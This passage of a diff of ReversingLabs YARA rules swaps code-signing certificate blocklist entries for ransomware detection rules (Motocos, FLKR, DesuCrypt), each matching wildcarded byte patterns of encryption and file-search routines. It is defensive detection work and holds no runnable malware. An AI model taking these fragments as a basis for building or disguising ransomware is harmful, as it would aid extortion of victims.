+            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 02
+            7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2A
+        }
+		$unzip_packed_file = {
+            28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 0B 06 07 2E ?? 07 06 28 ?? ?? ?? ?? 2D ?? 14
+            2A 02 73 ?? ?? ?? ?? 0C 16 8D ?? ?? ?? ?? 0D 08 6F ?? ?? ?? ?? 13 04 11 04 20
+            ?? ?? ?? ?? 40 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 68 13 05 08 6F ?? ?? ?? ?? 13 06
+            08 6F ?? ?? ?? ?? 13 07 11 04 20 ?? ?? ?? ?? 33 ?? 11 05 1F 14 33 ?? 11 06 2D
+            ?? 11 07 1E 2E ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? ?? 26 08 6F
+            ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 13 08 08 6F ?? ?? ?? ??
+            13 09 08 6F ?? ?? ?? ?? 13 0A 11 09 16 31 ?? 11 09 8D ?? ?? ?? ?? 13 0B 08 11
+            0B 16 11 09 6F ?? ?? ?? ?? 26 11 0A 16 31 ?? 11 0A 8D ?? ?? ?? ?? 13 0C 08 11
+            0C 16 11 0A 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 59 D4 8D ??
+            ?? ?? ?? 13 0D 08 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? 26 11 0D 73 ?? ?? ?? ??
+            13 0E 11 08 8D ?? ?? ?? ?? 0D 11 0E 09 16 09 8E 69 6F ?? ?? ?? ?? 26 14 13 0D
+            38 ?? ?? ?? ?? 11 04 1F 18 63 13 0F 11 04 11 0F 1F 18 62 59 13 04 11 04 20 ??
+            ?? ?? ?? 40 ?? ?? ?? ?? 11 0F 17 33 ?? 08 6F ?? ?? ?? ?? 13 10 11 10 8D ?? ??
+            ?? ?? 0D 16 13 11 2B ?? 08 6F ?? ?? ?? ?? 13 12 08 6F ?? ?? ?? ?? 13 13 11 12
+            8D ?? ?? ?? ?? 13 15 08 11 15 16 11 15 8E 69 6F ?? ?? ?? ?? 26 11 15 73 ?? ??
+            ?? ?? 13 14 11 14 09 11 11 11 13 6F ?? ?? ?? ?? 26 11 11 11 13 58 13 11 11 11
+            11 10 32 ?? 11 0F 18 33 ?? 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            13 16 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 17 11 16 11 17 17
+            28 ?? ?? ?? ?? 13 18 11 18 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 19 11 19 28
+            ?? ?? ?? ?? 0D DE ?? 11 18 2C ?? 11 18 6F ?? ?? ?? ?? DC 11 0F 19 33 ?? 1F 10
+            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1A 1F 10 8D ?? ?? ?? ?? 25
+            D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1B 11 1A 11 1B 17 28 ?? ?? ?? ?? 13 1C 11 1C
+            02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 1D 11 1D 28 ?? ?? ?? ?? 0D DE 17 11 1C
+            2C ?? 11 1C 6F ?? ?? ?? ?? DC 72 B5 0E 00 70 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ??
+            ?? 14 0C 09 2A
+        }
+		$resolve_assembly = {
+            12 00 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 00 16 28 ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 13 11 13 16 1F
+            2C 9D 11 13 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 13 04 16 13 05 16 13 06 16 13 07 2B ??
+            09 11 07 9A 08 28 ?? ?? ?? ?? 2C 0A 09 11 07 17 58 9A 13 04 2B ?? 11 07 18 58 13 07
+            11 07 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 2D ?? 12 00 7B ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2D ?? 28 ?? ?? ?? ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 16
+            13 08 2B ?? 09 11 08 9A 08 28 ?? ?? ?? ?? 2C ?? 09 11 08 17 58 9A 13 04 2B ?? 11 08
+            18 58 13 08 11 08 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 11 04
+            16 6F ?? ?? ?? ?? 1F 5B 33 ?? 11 04 1F 5D 6F ?? ?? ?? ?? 13 09 11 04 17 11 09 17 59
+            6F ?? ?? ?? ?? 13 0A 11 0A 1F 7A 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 05 11 0A 1F 74
+            6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 06 11 04 11 09 17 58 6F ?? ?? ?? ?? 13 04 7E ??
+            ?? ?? ?? 25 13 14 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? 2C ?? 7E ?? ??
+            ?? ?? 11 04 6F ?? ?? ?? ?? 13 12 DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 6F ?? ?? ?? ??
+            13 0B 11 0B 39 ?? ?? ?? ?? 11 0B 6F ?? ?? ?? ?? 69 13 0C 11 0C 8D ?? ?? ?? ?? 13 0D
+            11 0B 11 0D 16 11 0C 6F ?? ?? ?? ?? 26 11 05 2C ?? 11 0D 28 ?? ?? ?? ?? 13 0D 14 13
+            0E 11 06 2D ?? 11 0D 28 ?? ?? ?? ?? 13 0E DE 0C 26 17 13 06 DE ?? 26 17 13 06 DE ??
+            11 06 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 28 ?? ?? ?? ?? 13 0F 11 0F 28 ?? ??
+            ?? ?? 26 11 0F 12 00 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 10 11 10 28 ??
+            ?? ?? ?? 2D ?? 11 10 28 ?? ?? ?? ?? 13 11 11 11 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ??
+            11 11 6F ?? ?? ?? ?? 11 10 14 1A 28 ?? ?? ?? ?? 26 11 0F 14 1A 28 ?? ?? ?? ?? 26 11
+            10 28 ?? ?? ?? ?? 13 0E DE ?? 26 DE ?? 7E ?? ?? ?? ?? 11 04 11 0E 6F ?? ?? ?? ?? 11
+            0E 13 12 DE ?? DE ?? 11 14 28 ?? ?? ?? ?? DC 14 2A 11 12 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and ( pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" or pe.signatures [ i ] . serial == "97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" ) and 1602636910 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $call_encrypt and $encrypt_files and $start_process ) or ( $msgbox_timer ) or ( $unzip_packed_file and $resolve_assembly ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Motocos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Motocos ransomware."
 		author = "ReversingLabs"
-		id = "9279d4ee-3f53-5d68-aaa1-af6ed579310f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "cda44b86-c747-5b48-acd8-e68311ab24a3"
+		date = "2021-09-17"
+		modified = "2021-09-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6030-L6046"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0444a5052ee384451ebd85918bbc6bf6d6a75334899a63a8b5828ef06cb9c7ca"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Motocos.yara#L1-L75"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "34b99847f029a291808f08ba6e6ae62a54e6fed5acc928fe4828054801786881"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Motocos"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$generate_key = {
+            55 8B EC 83 C4 ?? 53 89 4D ?? 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 15
+            ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 ?? ??
+            ?? ?? 64 FF 32 64 89 22 8B 4D ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68
+            ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B D8 89 5D ?? 80
+            7D ?? ?? 75 ?? 8B 5D ?? 03 DB 53 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 8D 45 ?? 50 8B 45 ?? 50 6A ?? 80 7D ?? ?? F5 1B C0 50 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 84 C0 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ??
+            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
+            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 D2 55 68 ?? ?? ?? ?? 64 FF
+            32 64 89 22 B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B D8 8B C3 8B D8 F6 C3 ?? 74 ?? 66 83 E3 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B C3
+            E8 ?? ?? ?? ?? 8B D0 B1 ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 4D ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 D2
+            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 8B 10 FF 12 8B C8 8B 55 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B C8 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 88 45 ?? 33 C0 5A 59 59 64
+            89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ??
+            ?? EB ?? 80 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 45 ?? 89 45 ?? C6 45 ?? ?? B8 ?? ?? ?? ??
+            89 45 ?? C6 45 ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 88 45
+            ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? E9
+        }
+		$find_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 8B FA 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 7C ?? 8B 45 ?? 66
+            83 3C 58 ?? 75 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? E8 ?? ?? ?? ??
+            8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 8D 45 ?? 50 8D 53 ?? 8B CE 8B 45 ?? E8 ?? ?? ??
+            ?? 8B C7 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C7 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
+            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" and 1602234590 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $generate_key ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_FLKR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FLKR ransomware."
 		author = "ReversingLabs"
-		id = "f039f379-e3d5-56bd-83b7-016881538017"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7f3abcd0-8dfa-5914-9ad0-566c16c2e2ab"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6048-L6066"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6e78750d6aca91e9e6d8f2651a5682ccdab5cd20ee3a74e1f8582eb7bc45d614"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.FLKR.yara#L1-L71"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4ab00ba82baceec9899556d3a774ec08c83c10930cec194e18e3b4e16ebacb58"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FLKR"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_and_encrypt_p1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 8B BC 24 ??
+            ?? ?? ?? 57 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 44
+            24 ?? FF D5 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 54 24 ?? 52 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
+            57 C6 04 07 ?? FF D5 F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84
+            C0 0F 85 ?? ?? ?? ?? 8A 0F 33 D2 84 C9 74 ?? BE ?? ?? ?? ?? 8B C7 2B F7 88 0C 06 8A
+            48 ?? 40 42 84 C9 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 82 ?? ?? ?? ?? ?? C6 82 ??
+            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6
+            74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? 57 FF D5 57 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 38 44 24 ?? 74
+        }
+		$search_and_encrypt_p2 = {
+            40 80 7C 04 ?? ?? 75 ?? 8A 4C 04 ?? 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 80 7C 04 ??
+            ?? 75 ?? 80 7C 04 ?? ?? 74 ?? 80 F9 ?? 75 ?? B3 ?? 38 5C 04 ?? 75 ?? 80 7C 04 ?? ??
+            75 ?? 80 7C 04 ?? ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? FF 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? B3 ?? B2 ?? 80 F9 ?? 75 ?? 38 5C 04 ?? 75
+            ?? 80 7C 04 ?? ?? 75 ?? 38 5C 04 ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
+            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
+            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 0F 84 ?? ?? ?? ?? 84 D2 0F 84 ?? ?? ?? ?? 8A 0F
+            33 D2 84 C9 74 ?? 8D B4 24 ?? ?? ?? ?? 8B C7 2B F7 8D A4 24 ?? ?? ?? ?? 88 0C 06 8A
+            48 ?? 40 42 84 C9 75 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 0F B6
+            05 ?? ?? ?? ?? C6 84 14 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 33 C0 6A ?? 89 8C 24 ?? ?? ?? ?? 89 94 24 ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 68 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 0D ??
+            ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B E8 A1 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 66 8B 15 ?? ?? ??
+            ?? 89 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 8D 74 24 ?? 89 6C 24 ?? 66 89
+        }
+		$search_and_encrypt_p3 = {
+            94 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ??
+            52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 56
+            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50
+            8D 84 24 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
+            ?? 51 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? FF 05 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 2B F0 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 03
+            C6 50 8D 8C 24 ?? ?? ?? ?? 51 8B D1 52 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? FF 05 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 55 E8 ?? ??
+            ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 56 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and ( pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" or pe.signatures [ i ] . serial == "b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" ) and 1602612570 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $search_and_encrypt_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Desucrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DesuCrypt ransomware."
 		author = "ReversingLabs"
-		id = "e1f56719-e726-5f81-99d4-937e343cbcc9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b9b3ce2b-f184-5bfa-8e1c-a7b996ac708a"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6068-L6084"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e1a3f27b8b9b642fe1ca73ec54d225f4470b53d0d06f2eea55ad1ad43ec67b39"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DesuCrypt.yara#L1-L93"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bd3ba8ea0fc16aad859a73628d0eda180d49298162fe239acf81c7c4e371eaad"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DesuCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
+            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
+            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
+            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
+            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
+            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encrypt_files = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
